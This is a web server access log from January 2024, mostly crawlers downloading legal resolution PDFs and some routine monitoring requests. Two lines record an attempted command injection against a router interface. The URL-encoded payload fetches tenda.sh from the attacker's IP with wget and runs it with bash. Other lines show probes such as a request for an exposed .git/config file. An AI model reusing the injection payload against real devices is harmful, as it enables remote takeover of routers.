156.59.198.135 - - [07/Jan/2024:03:00:22 -0500] "GET /BLA/resoluciones/AUTOS%202019/1430.pdf HTTP/1.0" 200 262390
216.244.66.195 - - [07/Jan/2024:03:00:24 -0500] "GET /BLA/resoluciones/AUTOS%202011/0709.pdf HTTP/1.1" 200 185059
216.244.66.195 - - [07/Jan/2024:03:00:27 -0500] "GET /BLA/resoluciones/AUTOS%202011/0795.pdf HTTP/1.1" 200 160299
216.244.66.195 - - [07/Jan/2024:03:00:31 -0500] "GET /BLA/resoluciones/AUTOS%202011/0853.pdf HTTP/1.1" 200 173225
216.244.66.195 - - [07/Jan/2024:03:00:34 -0500] "GET /BLA/resoluciones/AUTOS%202011/1034.pdf HTTP/1.1" 200 386988
216.245.221.92 - - [07/Jan/2024:03:00:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Jan/2024:03:00:38 -0500] "GET /BLA/resoluciones/AUTOS%202011/1642.pdf HTTP/1.1" 200 137016
216.244.66.195 - - [07/Jan/2024:03:00:41 -0500] "GET /BLA/resoluciones/AUTOS%202011/1772.pdf HTTP/1.1" 200 243359
216.244.66.195 - - [07/Jan/2024:03:00:46 -0500] "GET /BLA/resoluciones/AUTOS%202011/1809.pdf HTTP/1.1" 200 140160
156.59.198.135 - - [07/Jan/2024:03:00:47 -0500] "GET /BLA/resoluciones/AUTOS%202019/1613.pdf HTTP/1.0" 200 268131
40.77.167.16 - - [07/Jan/2024:03:00:47 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
216.244.66.195 - - [07/Jan/2024:03:00:53 -0500] "GET /BLA/resoluciones/AUTOS%202011/2020.pdf HTTP/1.1" 200 202636
185.224.128.191 - - [07/Jan/2024:03:00:56 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20-O-%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20bash%20tenda.sh) HTTP/1.1" 404 1018
185.224.128.191 - - [07/Jan/2024:03:00:56 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20-O-%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20bash%20tenda.sh) HTTP/1.1" 404 1018
216.244.66.195 - - [07/Jan/2024:03:00:58 -0500] "GET /BLA/resoluciones/AUTOS%202011/2439.pdf HTTP/1.1" 200 166440
216.244.66.195 - - [07/Jan/2024:03:01:03 -0500] "GET /BLA/resoluciones/AUTOS%202011/2449.pdf HTTP/1.1" 200 246740
216.244.66.195 - - [07/Jan/2024:03:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202011/2642.pdf HTTP/1.1" 200 164073
216.244.66.195 - - [07/Jan/2024:03:01:10 -0500] "GET /BLA/resoluciones/AUTOS%202011/2971.pdf HTTP/1.1" 200 152371
156.59.198.136 - - [07/Jan/2024:03:01:12 -0500] "GET /BLA/resoluciones/AUTOS%202019/1223.pdf HTTP/1.0" 200 286451
216.244.66.195 - - [07/Jan/2024:03:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202011/3042.pdf HTTP/1.1" 200 160627
216.244.66.195 - - [07/Jan/2024:03:01:15 -0500] "GET /BLA/resoluciones/AUTOS%202011/3044.pdf HTTP/1.1" 200 263607
216.244.66.195 - - [07/Jan/2024:03:01:18 -0500] "GET /BLA/resoluciones/AUTOS%202011/3074.pdf HTTP/1.1" 200 258223
216.244.66.195 - - [07/Jan/2024:03:01:22 -0500] "GET /BLA/resoluciones/AUTOS%202011/3254.pdf HTTP/1.1" 200 313825
216.244.66.195 - - [07/Jan/2024:03:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202011/3663.pdf HTTP/1.1" 200 288821
201.245.192.253 - - [07/Jan/2024:03:01:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
216.244.66.195 - - [07/Jan/2024:03:01:34 -0500] "GET /BLA/resoluciones/AUTOS%202011/3711.pdf HTTP/1.1" 200 183464
156.59.198.136 - - [07/Jan/2024:03:01:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/0557.pdf HTTP/1.0" 200 257205
216.244.66.195 - - [07/Jan/2024:03:01:40 -0500] "GET /BLA/resoluciones/AUTOS%202012/0110.pdf HTTP/1.1" 200 635657
52.167.144.145 - - [07/Jan/2024:03:01:45 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
216.244.66.195 - - [07/Jan/2024:03:01:46 -0500] "GET /BLA/resoluciones/AUTOS%202012/0159.pdf HTTP/1.1" 200 667342
52.167.144.161 - - [07/Jan/2024:03:01:49 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
156.59.198.135 - - [07/Jan/2024:03:02:01 -0500] "GET /BLA/resoluciones/AUTOS%202019/1457.pdf HTTP/1.0" 200 267470
216.244.66.195 - - [07/Jan/2024:03:02:09 -0500] "GET /BLA/resoluciones/AUTOS%202012/0413.pdf HTTP/1.1" 200 182958
52.167.144.161 - - [07/Jan/2024:03:02:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/3347.pdf HTTP/1.1" 200 411440
172.22.2.4 - - [07/Jan/2024:03:00:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:02:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/0818.pdf HTTP/1.0" 200 260680
216.244.66.195 - - [07/Jan/2024:03:02:28 -0500] "GET /BLA/resoluciones/AUTOS%202012/0917.pdf HTTP/1.1" 200 177270
52.167.144.161 - - [07/Jan/2024:03:02:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2676.pdf HTTP/1.1" 200 835700
216.244.66.195 - - [07/Jan/2024:03:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202012/0950.pdf HTTP/1.1" 200 171296
156.59.198.135 - - [07/Jan/2024:03:02:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/0708.pdf HTTP/1.0" 200 256743
216.244.66.195 - - [07/Jan/2024:03:03:01 -0500] "GET /BLA/resoluciones/AUTOS%202012/1011.pdf HTTP/1.1" 200 355180
172.22.2.4 - - [07/Jan/2024:03:01:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58172
156.59.198.135 - - [07/Jan/2024:03:03:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2002.pdf HTTP/1.0" 200 318296
216.244.66.195 - - [07/Jan/2024:03:03:16 -0500] "GET /BLA/resoluciones/AUTOS%202012/1341.pdf HTTP/1.1" 200 160469
216.244.66.195 - - [07/Jan/2024:03:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202012/1498.pdf HTTP/1.1" 200 679631
156.59.198.135 - - [07/Jan/2024:03:03:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/1904.pdf HTTP/1.0" 200 261224
216.244.66.195 - - [07/Jan/2024:03:03:55 -0500] "GET /BLA/resoluciones/AUTOS%202012/1549.pdf HTTP/1.1" 200 249247
156.59.198.135 - - [07/Jan/2024:03:04:03 -0500] "GET /BLA/resoluciones/AUTOS%202019/0160.pdf HTTP/1.0" 200 327737
216.244.66.195 - - [07/Jan/2024:03:04:13 -0500] "GET /BLA/resoluciones/AUTOS%202012/1612.pdf HTTP/1.1" 200 420757
156.59.198.135 - - [07/Jan/2024:03:04:27 -0500] "GET /BLA/resoluciones/AUTOS%202019/0868.pdf HTTP/1.0" 200 265191
216.244.66.195 - - [07/Jan/2024:03:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202012/1835.pdf HTTP/1.1" 200 682773
216.244.66.195 - - [07/Jan/2024:03:04:49 -0500] "GET /BLA/resoluciones/AUTOS%202012/1944.pdf HTTP/1.1" 200 263300
156.59.198.135 - - [07/Jan/2024:03:04:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/1478.pdf HTTP/1.0" 200 265821
172.22.2.4 - - [07/Jan/2024:03:04:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
156.59.198.135 - - [07/Jan/2024:03:05:15 -0500] "GET /BLA/resoluciones/AUTOS%202019/2146.pdf HTTP/1.0" 200 298798
52.167.144.161 - - [07/Jan/2024:03:05:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/1234.pdf HTTP/1.1" 200 748137
216.245.221.92 - - [07/Jan/2024:03:05:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:05:39 -0500] "GET /BLA/resoluciones/AUTOS%202019/1990.pdf HTTP/1.0" 200 313173
156.59.198.135 - - [07/Jan/2024:03:06:04 -0500] "GET /BLA/resoluciones/AUTOS%202019/1332.pdf HTTP/1.0" 200 252031
156.59.198.136 - - [07/Jan/2024:03:06:28 -0500] "GET /BLA/resoluciones/AUTOS%202019/0175.pdf HTTP/1.0" 200 262309
201.245.192.253 - - [07/Jan/2024:03:06:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:06:52 -0500] "GET /BLA/resoluciones/AUTOS%202019/0695.pdf HTTP/1.0" 200 252509
156.59.198.135 - - [07/Jan/2024:03:07:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/1432.pdf HTTP/1.0" 200 262448
156.59.198.135 - - [07/Jan/2024:03:07:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/0696%20.pdf HTTP/1.0" 200 252652
172.22.2.4 - - [07/Jan/2024:03:06:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:08:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/0043.pdf HTTP/1.0" 200 302575
156.59.198.135 - - [07/Jan/2024:03:08:31 -0500] "GET /BLA/resoluciones/AUTOS%202019/1219.pdf HTTP/1.0" 200 253706
40.77.167.52 - - [07/Jan/2024:03:08:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/3634.pdf HTTP/1.1" 200 366505
172.22.2.4 - - [07/Jan/2024:03:07:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59330
156.59.198.135 - - [07/Jan/2024:03:08:54 -0500] "GET /BLA/resoluciones/AUTOS%202019/2482.pdf HTTP/1.0" 200 229150
156.59.198.135 - - [07/Jan/2024:03:09:19 -0500] "GET /BLA/resoluciones/AUTOS%202019/1376.pdf HTTP/1.0" 200 250536
156.59.198.135 - - [07/Jan/2024:03:09:43 -0500] "GET /BLA/resoluciones/AUTOS%202019/0300.pdf HTTP/1.0" 200 289030
156.59.198.136 - - [07/Jan/2024:03:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202019/1726.pdf HTTP/1.0" 200 291416
156.59.198.135 - - [07/Jan/2024:03:10:31 -0500] "GET /BLA/resoluciones/AUTOS%202019/2182.pdf HTTP/1.0" 200 255743
216.245.221.92 - - [07/Jan/2024:03:10:35 -0500] "HEAD / HTTP/1.1" 200 -
69.63.189.8 - - [07/Jan/2024:03:10:42 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
162.55.173.23 - - [07/Jan/2024:03:10:56 -0500] "GET / HTTP/1.1" 200 4720
162.55.173.23 - - [07/Jan/2024:03:10:57 -0500] "GET / HTTP/1.1" 200 319
156.59.198.136 - - [07/Jan/2024:03:10:57 -0500] "GET /BLA/resoluciones/AUTOS%202019/1458.pdf HTTP/1.0" 200 259573
156.59.198.135 - - [07/Jan/2024:03:11:21 -0500] "GET /BLA/resoluciones/AUTOS%202019/1028.pdf HTTP/1.0" 200 163101
52.56.149.171 - - [07/Jan/2024:03:11:25 -0500] "" 400 226
201.245.192.253 - - [07/Jan/2024:03:11:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:11:45 -0500] "GET /BLA/resoluciones/AUTOS%202019/0022.pdf HTTP/1.0" 200 249137
156.59.198.135 - - [07/Jan/2024:03:12:10 -0500] "GET /BLA/resoluciones/AUTOS%202019/0839.pdf HTTP/1.0" 200 314027
156.59.198.136 - - [07/Jan/2024:03:12:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/1030.pdf HTTP/1.0" 200 267250
156.59.198.135 - - [07/Jan/2024:03:12:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/1652.pdf HTTP/1.0" 200 318831
156.59.198.135 - - [07/Jan/2024:03:13:23 -0500] "GET /BLA/resoluciones/AUTOS%202019/1471.pdf HTTP/1.0" 200 262699
156.59.198.136 - - [07/Jan/2024:03:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202019/1133.pdf HTTP/1.0" 200 285665
172.22.2.4 - - [07/Jan/2024:03:12:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:14:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/1488.pdf HTTP/1.0" 200 266613
51.222.253.4 - - [07/Jan/2024:03:14:19 -0500] "GET /robots.txt HTTP/1.1" 404 1018
156.59.198.136 - - [07/Jan/2024:03:14:35 -0500] "GET /BLA/resoluciones/AUTOS%202019/0276.pdf HTTP/1.0" 200 256944
172.22.2.4 - - [07/Jan/2024:03:13:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52418
156.59.198.135 - - [07/Jan/2024:03:15:00 -0500] "GET /BLA/resoluciones/AUTOS%202019/1523.pdf HTTP/1.0" 200 254606
201.245.192.253 - - [07/Jan/2024:03:15:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
201.245.192.253 - - [07/Jan/2024:03:15:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
156.59.198.135 - - [07/Jan/2024:03:15:24 -0500] "GET /BLA/resoluciones/AUTOS%202019/0270.pdf HTTP/1.0" 200 247487
216.245.221.92 - - [07/Jan/2024:03:15:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Jan/2024:03:15:35 -0500] "GET /robots.txt HTTP/1.1" 404 1018
156.59.198.135 - - [07/Jan/2024:03:15:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/1646.pdf HTTP/1.0" 200 243575
156.59.198.135 - - [07/Jan/2024:03:16:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0371.pdf HTTP/1.0" 200 336761
201.245.192.253 - - [07/Jan/2024:03:16:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:16:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3261.pdf HTTP/1.0" 200 474743
156.59.198.135 - - [07/Jan/2024:03:17:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3574.pdf HTTP/1.0" 200 839498
156.59.198.136 - - [07/Jan/2024:03:17:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0965.pdf HTTP/1.0" 200 562171
156.59.198.136 - - [07/Jan/2024:03:17:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/1675.pdf HTTP/1.0" 200 233914
156.59.198.135 - - [07/Jan/2024:03:18:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0737.pdf HTTP/1.0" 200 363553
156.59.198.136 - - [07/Jan/2024:03:18:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0524.pdf HTTP/1.0" 200 353770
156.59.198.136 - - [07/Jan/2024:03:19:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1298.pdf HTTP/1.0" 200 339892
172.22.2.4 - - [07/Jan/2024:03:17:35 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 54780
40.77.167.52 - - [07/Jan/2024:03:19:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/2338.pdf HTTP/1.1" 200 328770
201.245.192.253 - - [07/Jan/2024:03:19:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
156.59.198.135 - - [07/Jan/2024:03:19:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0422.pdf HTTP/1.0" 200 345399
52.167.144.190 - - [07/Jan/2024:03:19:39 -0500] "GET /el-reverdecer-de-bogota-no-para-207-nuevos-arboles-plantados-en-el-sur-de-la-ciudad.html HTTP/1.1" 200 912
172.22.2.4 - - [07/Jan/2024:03:18:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.52 - - [07/Jan/2024:03:19:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/01699.pdf HTTP/1.1" 200 875222
156.59.198.135 - - [07/Jan/2024:03:19:52 -0500] "GET /BLA/resoluciones/AUTOS%202019/0094.pdf HTTP/1.0" 200 257017
156.59.198.136 - - [07/Jan/2024:03:20:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0562.pdf HTTP/1.0" 200 472267
172.22.2.4 - - [07/Jan/2024:03:18:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54423
201.245.192.253 - - [07/Jan/2024:03:20:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
216.245.221.92 - - [07/Jan/2024:03:20:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:20:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0190.pdf HTTP/1.0" 200 560937
156.59.198.135 - - [07/Jan/2024:03:21:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0091.pdf HTTP/1.0" 200 346333
52.56.149.171 - - [07/Jan/2024:03:21:25 -0500] "" 400 226
201.245.192.253 - - [07/Jan/2024:03:21:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:03:21:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/0534.pdf HTTP/1.0" 200 218042
156.59.198.136 - - [07/Jan/2024:03:21:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/1679.pdf HTTP/1.0" 200 240787
156.59.198.135 - - [07/Jan/2024:03:22:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1523.pdf HTTP/1.0" 200 442342
156.59.198.135 - - [07/Jan/2024:03:22:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0186.pdf HTTP/1.0" 200 1457748
156.59.198.135 - - [07/Jan/2024:03:23:07 -0500] "GET /BLA/resoluciones/AUTOS%202019/2171.pdf HTTP/1.0" 200 255145
156.59.198.135 - - [07/Jan/2024:03:23:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1690.pdf HTTP/1.0" 200 1019726
52.167.144.220 - - [07/Jan/2024:03:23:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1606.pdf HTTP/1.1" 200 3768938
156.59.198.135 - - [07/Jan/2024:03:23:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2253.pdf HTTP/1.0" 200 412317
156.59.198.136 - - [07/Jan/2024:03:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202019/2050.pdf HTTP/1.0" 200 10416
156.59.198.136 - - [07/Jan/2024:03:24:47 -0500] "GET /BLA/resoluciones/AUTOS%202019/1670.pdf HTTP/1.0" 200 241140
201.245.192.253 - - [07/Jan/2024:03:25:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
156.59.198.136 - - [07/Jan/2024:03:25:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/1431.pdf HTTP/1.0" 200 261728
201.245.192.253 - - [07/Jan/2024:03:25:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
172.22.2.4 - - [07/Jan/2024:03:23:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Jan/2024:03:25:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [07/Jan/2024:03:25:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3423.pdf HTTP/1.0" 200 1643119
172.22.2.4 - - [07/Jan/2024:03:26:00 -0500] "GET /BLA/boletinlegal/admin/.git/config HTTP/1.1" 404 1018
156.59.198.136 - - [07/Jan/2024:03:26:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0382.pdf HTTP/1.0" 200 384284
198.235.24.11 - - [07/Jan/2024:03:26:16 -0500] "\x16\x03\x01" 400 226
198.235.24.11 - - [07/Jan/2024:03:26:16 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [07/Jan/2024:03:24:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59330
201.245.192.253 - - [07/Jan/2024:03:26:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.135 - - [07/Jan/2024:03:26:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3241.pdf HTTP/1.0" 200 344823
156.59.198.135 - - [07/Jan/2024:03:26:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/2440.pdf HTTP/1.0" 200 259288
156.59.198.136 - - [07/Jan/2024:03:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202019/0432.pdf HTTP/1.0" 200 288754
156.59.198.136 - - [07/Jan/2024:03:27:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0090.pdf HTTP/1.0" 200 1195287
156.59.198.136 - - [07/Jan/2024:03:28:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0390.pdf HTTP/1.0" 200 337906
156.59.198.136 - - [07/Jan/2024:03:28:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2152.pdf HTTP/1.0" 200 1456566
156.59.198.136 - - [07/Jan/2024:03:28:54 -0500] "GET /BLA/resoluciones/AUTOS%202019/0211.pdf HTTP/1.0" 200 247172
52.167.144.220 - - [07/Jan/2024:03:28:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/02499.pdf HTTP/1.1" 200 439837
156.59.198.136 - - [07/Jan/2024:03:29:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1976.pdf HTTP/1.0" 200 408837
201.245.192.253 - - [07/Jan/2024:03:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
207.90.244.5 - - [07/Jan/2024:03:29:29 -0500] "GET / HTTP/1.1" 200 319
207.90.244.5 - - [07/Jan/2024:03:29:29 -0500] "GET /robots.txt HTTP/1.1" 404 1018
207.90.244.5 - - [07/Jan/2024:03:29:29 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
207.90.244.5 - - [07/Jan/2024:03:29:30 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 1018
207.90.244.5 - - [07/Jan/2024:03:29:30 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
156.59.198.135 - - [07/Jan/2024:03:29:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1990.pdf HTTP/1.0" 200 481162
201.245.192.253 - - [07/Jan/2024:03:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
156.59.198.135 - - [07/Jan/2024:03:30:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2980.pdf HTTP/1.0" 200 490105
52.167.144.190 - - [07/Jan/2024:03:30:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/1235.pdf HTTP/1.1" 200 938346
156.59.198.136 - - [07/Jan/2024:03:30:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1778.pdf HTTP/1.0" 200 426539
216.245.221.92 - - [07/Jan/2024:03:30:35 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:03:30:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0497.pdf HTTP/1.0" 200 356934
156.59.198.135 - - [07/Jan/2024:03:31:20 -0500] "GET /BLA/resoluciones/AUTOS%202019/1340.pdf HTTP/1.0" 200 258544
172.22.2.4 - - [07/Jan/2024:03:29:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jan/2024:03:31:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
216.244.66.195 - - [07/Jan/2024:03:31:44 -0500] "GET /BLA/resoluciones/AUTOS%202007/0766.pdf HTTP/1.1" 200 94907
156.59.198.136 - - [07/Jan/2024:03:31:45 -0500] "GET /BLA/resoluciones/AUTOS%202019/1429.pdf HTTP/1.0" 200 263588
216.244.66.195 - - [07/Jan/2024:03:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202007/0819.pdf HTTP/1.1" 200 91956
216.244.66.195 - - [07/Jan/2024:03:31:56 -0500] "GET /BLA/resoluciones/AUTOS%202010/0122.pdf HTTP/1.1" 200 272657
216.244.66.195 - - [07/Jan/2024:03:32:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/0155.pdf HTTP/1.1" 200 193563
216.244.66.195 - - [07/Jan/2024:03:32:04 -0500] "GET /BLA/resoluciones/AUTOS%202010/0606.pdf HTTP/1.1" 200 194821
156.59.198.136 - - [07/Jan/2024:03:32:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1789.pdf HTTP/1.0" 200 349316
172.22.2.4 - - [07/Jan/2024:03:30:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60502
216.244.66.195 - - [07/Jan/2024:03:32:17 -0500] "GET /BLA/resoluciones/AUTOS%202010/0803.pdf HTTP/1.1" 200 177277
216.244.66.195 - - [07/Jan/2024:03:32:27 -0500] "GET /BLA/resoluciones/AUTOS%202010/0846.pdf HTTP/1.1" 200 131454
156.59.198.136 - - [07/Jan/2024:03:32:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1388.pdf HTTP/1.0" 200 335238
216.244.66.195 - - [07/Jan/2024:03:32:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/1427.pdf HTTP/1.1" 200 244075
216.244.66.195 - - [07/Jan/2024:03:32:45 -0500] "GET /BLA/resoluciones/AUTOS%202010/1887.pdf HTTP/1.1" 200 78840
216.244.66.195 - - [07/Jan/2024:03:32:51 -0500] "GET /BLA/resoluciones/AUTOS%202010/2791.pdf HTTP/1.1" 200 3627440
156.59.198.136 - - [07/Jan/2024:03:32:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2887.pdf HTTP/1.0" 200 949532
52.167.144.226 - - [07/Jan/2024:03:33:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/3698.pdf HTTP/1.1" 200 344306
216.244.66.195 - - [07/Jan/2024:03:33:12 -0500] "GET /BLA/resoluciones/AUTOS%202010/3619.pdf HTTP/1.1" 200 373346
156.59.198.136 - - [07/Jan/2024:03:33:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0180.pdf HTTP/1.0" 200 332335
216.244.66.195 - - [07/Jan/2024:03:33:23 -0500] "GET /BLA/resoluciones/AUTOS%202010/4350.pdf HTTP/1.1" 200 147460
216.244.66.195 - - [07/Jan/2024:03:33:35 -0500] "GET /BLA/resoluciones/AUTOS%202010/4406.pdf HTTP/1.1" 200 322481
216.244.66.195 - - [07/Jan/2024:03:33:43 -0500] "GET /BLA/resoluciones/AUTOS%202010/4565.pdf HTTP/1.1" 200 176043
156.59.198.136 - - [07/Jan/2024:03:33:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2222.pdf HTTP/1.0" 200 1482404
216.244.66.195 - - [07/Jan/2024:03:33:51 -0500] "GET /BLA/resoluciones/AUTOS%202010/5324.pdf HTTP/1.1" 200 151492
216.244.66.195 - - [07/Jan/2024:03:33:58 -0500] "GET /BLA/resoluciones/AUTOS%202010/5334.pdf HTTP/1.1" 200 1059863
156.59.198.136 - - [07/Jan/2024:03:34:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0995.pdf HTTP/1.0" 200 366767
172.22.2.4 - - [07/Jan/2024:03:34:31 -0500] "GET /BLA/boletinlegal/logger-1.min.js HTTP/1.1" 404 1022
156.59.198.136 - - [07/Jan/2024:03:34:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1415.pdf HTTP/1.0" 200 441756
216.244.66.195 - - [07/Jan/2024:03:34:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/6265.pdf HTTP/1.1" 200 233931
156.59.198.136 - - [07/Jan/2024:03:34:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2343.pdf HTTP/1.0" 200 354396
216.244.66.195 - - [07/Jan/2024:03:35:07 -0500] "GET /BLA/resoluciones/AUTOS%202010/6569.pdf HTTP/1.1" 200 3585995
201.245.192.253 - - [07/Jan/2024:03:35:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36480
201.245.192.253 - - [07/Jan/2024:03:35:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36773
156.59.198.135 - - [07/Jan/2024:03:35:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1271.pdf HTTP/1.0" 200 390711
216.245.221.92 - - [07/Jan/2024:03:35:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Jan/2024:03:35:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0612.pdf HTTP/1.1" 200 480227
156.59.198.135 - - [07/Jan/2024:03:35:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0373.pdf HTTP/1.0" 200 337892
156.59.198.135 - - [07/Jan/2024:03:36:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1043.pdf HTTP/1.0" 200 369731
